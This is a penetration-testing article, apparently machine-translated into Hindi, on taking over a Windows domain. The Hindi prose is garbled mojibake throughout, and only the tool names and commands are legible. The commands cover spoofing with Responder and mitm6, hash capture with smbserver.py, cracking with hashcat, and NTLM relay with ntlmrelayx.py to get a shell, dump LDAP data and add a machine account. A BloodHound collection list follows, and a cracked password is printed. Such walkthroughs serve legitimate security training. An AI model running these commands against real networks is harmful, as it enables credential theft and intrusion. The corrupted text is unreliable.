рдбреЛрдореЗрди рдЕрдЯреИрдХ


рдкреНрд░рд╡реЗрд╢ рдкрд░реАрдХреНрд╖рдг рдЖрдпреЛрдЬрд┐рдд рдХрд░рддреЗ рд╕рдордп, рд╣рдо рдЕрдХреНрд╕рд░ рдбреЛрдореЗрди рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдореЗрдВ рддреНрд░реБрдЯрд┐рдпреЛрдВ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рддреЗ рд╣реИрдВред рд╣рд╛рд▓рд╛рдВрдХрд┐ рдпрд╣ рдХрдИ рдХреЗ рд▓рд┐рдП рдорд╣рддреНрд╡рдкреВрд░реНрдг рдирд╣реАрдВ рд▓рдЧрддрд╛ рд╣реИ, рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ, рдЗрд╕ рддрд░рд╣ рдХреА рдЕрд╢реБрджреНрдзрд┐ рдХреЗ рдХрд╛рд░рдг рдкреВрд░реЗ рдбреЛрдореЗрди рдХреЛ рд╕рдордЭреМрддрд╛ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдПрдХ рдХрдВрдкрдиреА рдореЗрдВ рдкрдВрдЪрдХ рдХреЗ рдкрд░рд┐рдгрд╛рдореЛрдВ рдХреЗ рдЕрдиреБрд╕рд╛рд░, рд╣рдо рдЗрд╕ рдирд┐рд╖реНрдХрд░реНрд╖ рдкрд░ рдкрд╣реБрдВрдЪреЗ рдХрд┐ рдбреЛрдореЗрди рдореЗрдВ рд╕рднреА рдЙрдкрд▓рдмреНрдз рдорд╢реАрдиреЗрдВ Windows10 / Windows Server2016 рд╕реЗ рдХрдо рдирд╣реАрдВ рдереАрдВ, рдФрд░ рдЙрди рдкрд░ рд╕рднреА рдирд╡реАрдирддрдо рдкреИрдЪ рдереЗред рдиреЗрдЯрд╡рд░реНрдХ рдирд┐рдпрдорд┐рдд рд░реВрдк рд╕реЗ рд╕реНрдХреИрди рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛, рдорд╢реАрдиреЗрдВ рдХрдард┐рди рдереАрдВред рд╕рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЯреЛрдХрди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдмреИрдареЗ рдФрд░ рдЙрдирдХреЗ "20-рдЪрд░рд┐рддреНрд░ рдкрд╛рд╕рд╡рд░реНрдб" рдирд╣реАрдВ рдЬрд╛рдирддреЗ рдереЗред рд╕рдм рдХреБрдЫ рдареАрдХ рд▓рдЧ рд░рд╣рд╛ рд╣реИ, рд▓реЗрдХрд┐рди IPv6 рдХреЛ рдЕрдХреНрд╖рдо рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред рдбреЛрдореЗрди рдХреИрдкреНрдЪрд░ рд╕реНрдХреАрдо рдЗрд╕ рдкреНрд░рдХрд╛рд░ рджрд┐рдЦрддреА рд╣реИ:

mitm6 -> ntlmrelay -> рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣рдорд▓рд╛ -> рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рд╣реЛрддрд╛ рд╣реИ -> рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рд╣реЛрддрд╛ рд╣реИред

рджреБрд░реНрднрд╛рдЧреНрдп рд╕реЗ, рд▓реЛрдХрдкреНрд░рд┐рдп рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдЬреИрд╕реЗ рдХрд┐ OSCP, GPEN, рдпрд╛ CEH рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдкреИрда рдкрд░реАрдХреНрд╖рдг рдирд╣реАрдВ рд╕рд┐рдЦрд╛рддреЗ рд╣реИрдВред

рдЗрд╕ рд▓реЗрдЦ рдореЗрдВ, рд╣рдо рдХрдИ рдкреНрд░рдХрд╛рд░ рдХреЗ рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рд╣рдорд▓реЛрдВ рдкрд░ рдзреНрдпрд╛рди рджреЗрдВрдЧреЗ, рдЬрд┐рдиреНрд╣реЗрдВ рд╣рдордиреЗ рдкреЗрдВрдЯреНрд╕ рдХреЗ рд╣рд┐рд╕реНрд╕реЗ рдХреЗ рд░реВрдк рдореЗрдВ, рд╕рд╛рде рд╣реА рд╕рд╛рде рдкреНрд░рдпреБрдХреНрдд рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рд░реВрдк рдореЗрдВ рдХрд┐рдпрд╛ рдерд╛ред рдпрд╣ рдХрд┐рд╕реА рднреА рддрд░рд╣ рд╕реЗ рд╕рднреА рдкреНрд░рдХрд╛рд░ рдХреЗ рд╣рдорд▓реЛрдВ рдФрд░ рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рд▓рд┐рдП рдПрдХ рдкреВрд░реНрдг рдорд╛рд░реНрдЧрджрд░реНрд╢рд┐рдХрд╛ рдирд╣реАрдВ рдорд╛рдирд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рдЙрдирдореЗрдВ рд╕реЗ рдмрд╣реБрдд рд╕реЗ рд╣реИрдВ, рдФрд░ рдпрд╣ рдПрдХ рд▓реЗрдЦ рдореЗрдВ рдлрд┐рдЯ рд╣реЛрдирд╛ рдореБрд╢реНрдХрд┐рд▓ рд╣реИред

рдЗрд╕рд▓рд┐рдП, рдкреНрд░рджрд░реНрд╢рди рдХреЗ рд▓рд┐рдП, рд╣рдо рдХрд╛рд▓реА рд▓рд┐рдирдХреНрд╕ 2019 рдкрд░ рдПрдХ рд▓реИрдкрдЯреЙрдк рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ рдФрд░ рд╡рд░реНрдЪреБрдЕрд▓ рд╣реЛрд╕реНрдЯ рд╡реАрдПрдорд╡реЗрдпрд░ рдкрд░ рдЗрд╕ рдкрд░ рдЙрдард╛рдП рдЬрд╛рддреЗ рд╣реИрдВред рдХрд▓реНрдкрдирд╛ рдХрд░реЗрдВ рдХрд┐ рдкрдВрдЪрдХ рдХрд╛ рдореБрдЦреНрдп рд▓рдХреНрд╖реНрдп рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЕрдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ рд╣реИ, рдФрд░ рдЗрдирдкреБрдЯ рдХреЗ рд░реВрдк рдореЗрдВ рд╣рдо рдИрдерд░рдиреЗрдЯ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрдВрдкрдиреА рдХреЗ рдХреЙрд░реНрдкреЛрд░реЗрдЯ рдиреЗрдЯрд╡рд░реНрдХ рддрдХ рдкрд╣реБрдВрдЪ рд░рдЦрддреЗ рд╣реИрдВред рдбреЛрдореЗрди рдХрд╛ рдкрд░реАрдХреНрд╖рдг рд╢реБрд░реВ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдореЗрдВ рдПрдХ рдЦрд╛рддреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред

рдЦрд╛рддрд╛ рд╣реЛ рд░рд╣рд╛ рд╣реИ


рдореЗрд░реА рд░рд╛рдп рдореЗрдВ, рджреЛ рд╕рдмрд╕реЗ рдЖрдо рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВ, рдбреЛрдореЗрди рдЦрд╛рддрд╛ рд▓реЙрдЧрд┐рди рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рддрд░реАрдХреЗ: LLMNR / NBNS рд╕реНрдкреВрдлрд┐рдВрдЧ рдФрд░ IPv6 рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдкрд░ рд╣рдорд▓рд╛ред

рдПрд▓рдПрд▓рдПрдордПрдирдЖрд░ / рдПрдирдмреАрдПрдирдПрд╕ рд╕реНрдкреВрдлрд┐рдВрдЧ


рдЗрд╕ рд╣рдорд▓реЗ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдХрд╛рдлреА рдХреБрдЫ рдХрд╣рд╛ рдЧрдпрд╛ рд╣реИред рд▓рдмреНрдмреЛрд▓реБрдЖрдм рдпрд╣ рд╣реИ рдХрд┐ рдХреНрд▓рд╛рдЗрдВрдЯ рдорд▓реНрдЯреАрдХрд╛рд╕реНрдЯ рдПрд▓рдПрд▓рдПрдордПрдирдЖрд░ рднреЗрдЬрддрд╛ рд╣реИ рдФрд░ рдбреАрдПрдирдПрд╕ рд╡рд┐рдлрд▓ рд╣реЛрдиреЗ рдкрд░ рдореЗрдЬрдмрд╛рди рдирд╛рдореЛрдВ рдХреЛ рд╣рд▓ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдирдмреАрдЯреА-рдПрдирдПрд╕ рдЕрдиреБрд░реЛрдзреЛрдВ рдХреЛ рдкреНрд░рд╕рд╛рд░рд┐рдд рдХрд░рддрд╛ рд╣реИред рдХреЛрдИ рднреА рдиреЗрдЯрд╡рд░реНрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдРрд╕реЗ рдЕрдиреБрд░реЛрдзреЛрдВ рдХрд╛ рдЬрд╡рд╛рдм рджреЗ рд╕рдХрддрд╛ рд╣реИред

рдЙрдкрдХрд░рдг рдЬреЛ рдПрдХ рд╣рдорд▓реЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреЗ рд╣реИрдВ:

  • рдкреНрд░рддреНрдпреБрддреНрддрд░
  • Inveight
  • Metasploit рдореЙрдбреНрдпреВрд▓: рд╕рд╣рд╛рдпрдХ / рд╕реНрдкреВрдл / llmnr / llmnr_response, рд╕рд╣рд╛рдпрдХ / рд╕реНрдкреВрдл / nbns / nbns_response,
    рд╕рд╣рд╛рдпрдХ / рд╕рд░реНрд╡рд░ / рдХреИрдкреНрдЪрд░ / рдПрд╕рдПрдордмреА, рд╕рд╣рд╛рдпрдХ / рд╕рд░реНрд╡рд░ / рдХреИрдкреНрдЪрд░ / http_ntlm

рдПрдХ рд╕рдлрд▓ рд╣рдорд▓реЗ рдХреЗ рд╕рд╛рде, рд╣рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ NetNTLM рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

Responder -I eth0 -wrf 



рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк рд╣реИрд╢, рд╣рдо NTLM- рд░рд┐рд▓реЗ рдбрд┐рдмрдЧ рдпрд╛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

IPv6 рдХрд╛ рд╣рдорд▓рд╛


рдпрджрд┐ рдХреЙрд░реНрдкреЛрд░реЗрдЯ рдиреЗрдЯрд╡рд░реНрдХ рдореЗрдВ IPv6 рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рддреЛ рд╣рдо DHCPv6 рдЕрдиреБрд░реЛрдзреЛрдВ рдХрд╛ рдЬрд╡рд╛рдм рджреЗ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рд╣рдорд╛рд░реЗ IP рдкрддреЗ рдХреЛ рд╣рдорд▓рд╛рд╡рд░ рдорд╢реАрди рдкрд░ DNS рд╕рд░реНрд╡рд░ рдХреЗ рд░реВрдк рдореЗрдВ рд╕реЗрдЯ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдЪреВрдВрдХрд┐ IPv6 IPv4 рдкрд░ рдкреВрд░реНрд╡рддрд╛ рд▓реЗрддрд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рдХреНрд▓рд╛рдЗрдВрдЯ DNS рдХреНрд╡реЗрд░реА рд╣рдорд╛рд░реЗ рдкрддреЗ рдкрд░ рднреЗрдЬреА рдЬрд╛рдПрдВрдЧреАред рд╣рдорд▓реЗ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдпрд╣рд╛рдБ рдФрд░ рдкрдврд╝реЗрдВред

рдЙрдкрдХрд░рдг:


Mitm6 рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдЪрд▓ рд░рд╣рд╛ рд╣реИ

 mitm6 -i vmnet0 

рд╣рдорд▓реЗ рдХреЗ рдкреВрд░рд╛ рд╣реЛрдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдорд╛рд░реЗ IPv6 рдкрддреЗ рдХреЗ рд╕рд╛рде рдПрдХ рдирдпрд╛ DNS рд╕рд░реНрд╡рд░ рд╣рдорд▓реЗ рд╡рд╛рд▓реЗ рдХрд╛рд░реНрдп рдХреЗрдВрджреНрд░ рдкрд░ рджрд┐рдЦрд╛рдИ рджреЗрдЧрд╛ред



рд╣рдорд▓рд╛ рдорд╢реАрдиреЛрдВ рд╣рдорд╛рд░реЗ рдорд╢реАрди рдХреЗ рд╕рд╛рде рдкреНрд░рдорд╛рдгрд┐рдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░реЗрдВрдЧреЗред Smbserver.py рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрд╕рдПрдордмреА рд╕рд░реНрд╡рд░ рдХреЛ рдКрдкрд░ рдЙрдард╛рдиреЗ рдХреЗ рдмрд╛рдж, рд╣рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрд╢ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

 smbserver.py -smb2support SMB /root/SMB 



рд╣реИрд╢ рдПрдХреНрд╢рди рдкрд░ рдХрдмреНрдЬрд╛ рдХрд░ рд▓рд┐рдпрд╛


рдЕрдЧрд▓рд╛ рдХрджрдо рдпрд╛ рддреЛ рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрд╢ рдкрд░ рдПрдХ рдХреНрд░рд┐рдкреНрдЯреЛрдЧреНрд░рд╛рдлрд╝рд┐рдХ рд╣рдорд▓рд╛ рдХрд░рдирд╛ рд╣реИ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рд╕реНрдкрд╖реНрдЯ рдкрд╛рда рдореЗрдВ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ рд╣реИ, рдпрд╛ NTLS рд░рд┐рд▓реЗ рдХрд░рдирд╛ рд╣реИред

рдкрд╛рд╕рд╡рд░реНрдб рдЬрд╛рдирд╡рд░ рдмрд▓


рдпрд╣ рд╕рд░рд▓ рд╣реИ: рдПрдХ рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрд╢, рд╣реИрд╢рдЯреИрдХ рд▓реЗрдВ

 hashcat -m 5600 -a 3 hash.txt /usr/share/wordlists/rockyou.txt 

рдФрд░ рдХреНрд░реВрд░ред рдкрд╛рд╕рд╡рд░реНрдб рдпрд╛ рддреЛ рдкреНрд░рд╛рдкреНрдд рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ рдпрд╛ рдирд╣реАрдВ :)


рд╣рд╛рд░реНрд╡реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╛рд╕рд╡рд░реНрдб рдмрд░рд╛рдордж рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ - Pbvf2019

рдПрдирдЯреАрдПрд▓рдПрдо рд░рд┐рд▓реЗ


рд╣рдо NTLM рд░рд┐рд▓реЗ рдХрд╛ рдирд┐рд╖реНрдкрд╛рджрди рднреА рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдпрд╣ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж рдХрд┐ SMB рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ , рд╣рдо ntlmrelayx.py рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ рдФрд░ рдПрдХ рд╣рдорд▓реЗ рдХрд╛ рд╕рдВрдЪрд╛рд▓рди рдХрд░рддреЗ рд╣реИрдВред рдпрд╣рд╛рдВ рдлрд┐рд░ рд╕реЗ, рд▓рдХреНрд╖реНрдп рдХреЗ рдЖрдзрд╛рд░ рдкрд░, рд╣рдо рдЙрд╕ рд╡реЗрдХреНрдЯрд░ рдХрд╛ рдЪрдпрди рдХрд░рддреЗ рд╣реИрдВ рдЬрд┐рд╕рдХреА рд╣рдореЗрдВ рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдЖрдЗрдП рдЙрдирдореЗрдВ рд╕реЗ рдХреБрдЫ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВред


SMB рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣рдорд▓рд╛ рдорд╢реАрди рддрдХ рдкрд╣реБрдБрдЪ


рдХреБрдВрдЬреА i рдХреЗ рд╕рд╛рде рдПрдХ рд╣рдорд▓рд╛ рдХрд░реЗрдВред

 ntlmrelayx.py -t 192.168.1.5 -l loot -i 



рдПрдХ рд╕рдлрд▓ рд╣рдорд▓реЗ рдХреЗ рд╕рд╛рде, рд╣рдо netcat рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд░рд┐рдореЛрдЯ рдорд╢реАрди рд╕реЗ рдЬреБрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВред



рдбреЛрдореЗрди рд╕реВрдЪрдирд╛ рд╕рдВрдЧреНрд░рд╣


рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ, рд╣рдо рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рд╕реЗ рд░рд┐рд▓реЗ рдХрд░рддреЗ рд╣реИрдВред

 ntlmrelayx.py -t ldap://192.168.1.2 

рдпрджрд┐ рд╣рдорд▓рд╛ рд╕рдлрд▓ рд╣реЛрддрд╛ рд╣реИ, рддреЛ рд╣рдореЗрдВ рдбреЛрдореЗрди рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдорд┐рд▓ рдЬрд╛рдПрдЧреА:



рдбреЛрдореЗрди рдореЗрдВ рдПрдХ рдирдпрд╛ рдХрдВрдкреНрдпреВрдЯрд░ рдЬреЛрдбрд╝рдирд╛


рдкреНрд░рддреНрдпреЗрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ рдбреЛрдореЗрди рдореЗрдВ 10 рдХрдВрдкреНрдпреВрдЯрд░ рддрдХ рдмрдирд╛рдиреЗ рдХреА рдХреНрд╖рдорддрд╛ рд░рдЦрддрд╛ рд╣реИред рдХрдВрдкреНрдпреВрдЯрд░ рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдкрдХреЛ ldaps рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдкрд░ рдПрдХ рд░рд┐рд▓реЗ рдЪрд▓рд╛рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдПрдХ рдЕрдирдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб ldap рдХрдиреЗрдХреНрд╢рди рдкрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдФрд░ рдХрдВрдкреНрдпреВрдЯрд░ рдмрдирд╛рдирд╛ рдкреНрд░рддрд┐рдмрдВрдзрд┐рдд рд╣реИред рдпрджрд┐ SMB рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрдиреЗрдХреНрд╢рди рдЗрдВрдЯрд░рд╕реЗрдкреНрдЯреЗрдб рд╣реИ, рддреЛ рднреА, рдХреЛрдИ рдЦрд╛рддрд╛ рдирд╣реАрдВ рдмрдирд╛рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред

 ntlmrelayx.py -t ldaps://192.168.1.2 --add-computer 



рдЬреИрд╕рд╛ рдХрд┐ рдЖрдк рдЪрд┐рддреНрд░ рдореЗрдВ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рд╣рдо рдПрдХ рдХрдВрдкреНрдпреВрдЯрд░ RORYOTGS $ рдмрдирд╛рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рдереЗред

10 рд╕реЗ рдЕрдзрд┐рдХ рдХрдВрдкреНрдпреВрдЯрд░ рдмрдирд╛рддреЗ рд╕рдордп, рд╣рдореЗрдВ рдирд┐рдореНрди рдлрд╝реЙрд░реНрдо рдХреА рддреНрд░реБрдЯрд┐ рдорд┐рд▓рддреА рд╣реИ:



RORYOTGS $ рдХрдВрдкреНрдпреВрдЯрд░ рдХреА рд╕рд╛рдЦ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реБрдП, рд╣рдо рдПрдХ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдХреЗ рд▓рд┐рдП рд╡реИрдз рдЕрдиреБрд░реЛрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рдбреЛрдореЗрди рд╕реВрдЪрдирд╛ рд╕рдВрдЧреНрд░рд╣


рддреЛ, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдПрдХ рдбреЛрдореЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдпрд╛ рдХрдВрдкреНрдпреВрдЯрд░ рдЦрд╛рддрд╛ рд╣реИред рдкрд░реАрдХреНрд╖рдг рдЬрд╛рд░реА рд░рдЦрдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдореЗрдВ рдЖрдЧреЗ рдХреА рд╣рдорд▓реЗ рдХреА рдпреЛрдЬрдирд╛ рдХреЗ рд▓рд┐рдП рдЙрдкрд▓рдмреНрдз рдЬрд╛рдирдХрд╛рд░реА рдПрдХрддреНрд░ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдХреБрдЫ рдЙрдкрдХрд░рдгреЛрдВ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВ рдЬреЛ рд╣рдореЗрдВ рд╕рдмрд╕реЗ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдкреНрд░рдгрд╛рд▓рд┐рдпреЛрдВ рдХреА рдЦреЛрдЬ рдХрд╛ рдирд┐рд░реНрдзрд╛рд░рдг рдХрд░рдиреЗ, рдпреЛрдЬрдирд╛ рдмрдирд╛рдиреЗ рдФрд░ рдХрд┐рд╕реА рд╣рдорд▓реЗ рдХреЛ рдЕрдВрдЬрд╛рдо рджреЗрдиреЗ рдореЗрдВ рдорджрдж рдХрд░реЗрдВрдЧреЗред

рдЦреЛрдЬреА рдХреБрддреНрддрд╛


рд╕рдмрд╕реЗ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдЙрдкрдХрд░рдгреЛрдВ рдореЗрдВ рд╕реЗ рдПрдХ рдЬреЛ рд▓рдЧрднрдЧ рд╕рднреА рдЖрдВрддрд░рд┐рдХ рдкреИрда рдкрд░реАрдХреНрд╖рдг рдореЗрдВ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдкрд░рд┐рдпреЛрдЬрдирд╛ рдирдИ рд╕реБрд╡рд┐рдзрд╛рдУрдВ рджреНрд╡рд╛рд░рд╛ рд╕рдХреНрд░рд┐рдп рд░реВрдк рд╕реЗ рд╡рд┐рдХрд╕рд┐рдд рдФрд░ рдкреВрд░рдХ рд╣реИред

рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рджреНрд╡рд╛рд░рд╛ рдПрдХрддреНрд░ рдХреА рдЧрдИ рдЬрд╛рдирдХрд╛рд░реА
  • рд╕рдореВрд╣ - рд╕рдореВрд╣ рд╕рджрд╕реНрдпрддрд╛ рд╕рдВрдЧреНрд░рд╣ рдХрд░рддрд╛ рд╣реИ
  • LocalAdmin - рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕рдВрдЧреНрд░рд╣ рдХрд░рддрд╛ рд╣реИ
  • RDP - рджреВрд░рд╕реНрде рдбреЗрд╕реНрдХрдЯреЙрдк рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рдВрдЧреНрд░рд╣ рдХрд░рддрд╛ рд╣реИ
  • DCOM - рд╡рд┐рддрд░рд┐рдд COM рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рдВрдЧреНрд░рд╣ рдХрд░рддрд╛ рд╣реИ
  • GPOLocalGroup - рд╕рдореВрд╣ рдиреАрддрд┐ рдСрдмреНрдЬреЗрдХреНрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕рдВрдЧреНрд░рд╣ рдХрд░рддрд╛ рд╣реИ
  • рд╕рддреНрд░ - рд╕рддреНрд░ рд╕рдВрдЧреНрд░рд╣ рдХрд░рддрд╛ рд╣реИ
  • ComputerOnly - рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ, RDP, DCOM рдФрд░ рд╕рддреНрд░ рд╕рдВрдЧреНрд░рд╣ рдХрд░рддрд╛ рд╣реИ
  • рд▓реЙрдЧрдСрди - рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рд╕рддреНрд░ рд╕рдВрдЧреНрд░рд╣ рдХрд░рддрд╛ рд╣реИ (рд▓рдХреНрд╖реНрдп рд╕рд┐рд╕реНрдЯрдо рдкрд░ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ)
  • рдЯреНрд░рд╕реНрдЯ - рдбреЛрдореЗрди рдЯреНрд░рд╕реНрдЯ рдПрдиреНрдпреВрдорд░реЗрд╢рди рдХрд░рддрд╛ рд╣реИ
  • рдПрд╕реАрдПрд▓ - рдПрд╕реАрдПрд▓ рдХрд╛ рд╕рдВрдЧреНрд░рд╣ рдХрд░рддрд╛ рд╣реИ
  • рдХрдВрдЯреЗрдирд░ - рдХрдВрдЯреЗрдирд░реЛрдВ рдХрд╛ рд╕рдВрдЧреНрд░рд╣ рдХрд░рддрд╛ рд╣реИ;
  • DcOnly - рдХреЗрд╡рд▓ LDAP рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕рдВрдЧреНрд░рд╣ рдХрд░рддрд╛ рд╣реИред рд╕рдореВрд╣, рдЯреНрд░рд╕реНрдЯ, ACL, ObjectProps, рдХрдВрдЯреЗрдирд░ рдФрд░ GPOLocalGroup рд╢рд╛рдорд┐рд▓ рд╣реИрдВ
  • GPOLocalGroup рдФрд░ LogOn рдХреЛ рдЫреЛрдбрд╝рдХрд░ рд╕рднреА - рд╕рднреА рд╕рдВрдЧреНрд░рд╣ рд╡рд┐рдзрд┐рдпрд╛рдВ рдХрд░рддрд╛ рд╣реИ
  • рд╡рди рдЦреЛрдЬреЗрдВ - рдХреЗрд╡рд▓ рдЕрдкрдиреЗ рд╡рд░реНрддрдорд╛рди рдХреЗ рдмрдЬрд╛рдп рдЬрдВрдЧрд▓ рдореЗрдВ рд╕рднреА рдбреЛрдореЗрди рдЦреЛрдЬреЗрдВ
  • рдбреЛрдореЗрди - рдПрдХ рд╡рд┐рд╢реЗрд╖ рдбреЛрдореЗрди рдЦреЛрдЬреЗрдВред рдЕрдкрдиреЗ рд╡рд░реНрддрдорд╛рди рдбреЛрдореЗрди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИ рдпрджрд┐ рдЕрд╢рдХреНрдд (рдбрд┐рдлрд╝реЙрд▓реНрдЯ: рдЕрд╢рдХреНрдд)
